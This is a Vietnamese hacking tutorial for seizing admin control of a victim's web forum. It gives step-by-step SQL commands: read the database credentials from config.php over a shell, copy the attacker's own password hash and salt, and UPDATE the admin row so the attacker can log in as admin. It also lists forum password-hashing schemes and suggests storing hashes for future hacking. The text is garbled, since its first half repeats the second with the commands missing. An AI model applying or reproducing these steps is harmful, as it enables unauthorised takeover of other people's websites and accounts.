Tut này cho anh em học hỏi có rất nhiều trường hợp cần linh động.
Ở đây mình sẽ hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
Hiểu biết sơ về câu lệnh SQL
Đầu tiên là các dạng mã hóa của một vài forum thông dụng hiện nay như:
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Nếu forum victim có số lượng thành viện cỡ hơn 3000 thì ta dung lệnh :
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong forum victim có nhiều admin ma ta ko biết admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A: Vào file config.php và tìm các dòng sau
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thường thì mặc đinh định là userid=1 là rootadmin)
Ta tiếp tục dùng lệnh
Vi dụ:
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
là pass md5 của nick hacker
là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào forum victim đăng nhập bằng nick admin với password là 123456
Ở đây mình sẽ hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
PHP:
$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';
Đầu tiên là các dạng mã hóa của một vài forum thông dụng hiện nay như:
Với1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Với lệnh trên thì ta có thể xem được tất cả user trên forumSelect * from user
Nếu forum victim có số lượng thành viện cỡ hơn 3000 thì ta dung lệnh :
Ta đượcSelect password , salt from user where username='hacker'
Q: Tại sao lại phải select from userPass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong forum victim có nhiều admin ma ta ko biết admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A: Vào file config.php và tìm các dòng sau
PHP:
$config['SpecialUsers']['canviewadminlog'] $config['SpecialUsers']['canpruneadminlog'] $config['SpecialUsers']['superadministrators']
Ta tiếp tục dùng lệnh
Lấy được pass md5 & saltSelect password , salt from user where userid=1
Vi dụ:
Tiếp ta dùng lệnhPass md5 : eaf1672523371b7736282bbfc2c8b2ac Salt : 2/D
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
Câu lệnh hoàn chỉnh như sau:Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin”
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”
Code:
5cc70df698ca01c3adb396a08b4873ad
Code:
?`Y
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào forum victim đăng nhập bằng nick admin với password là 123456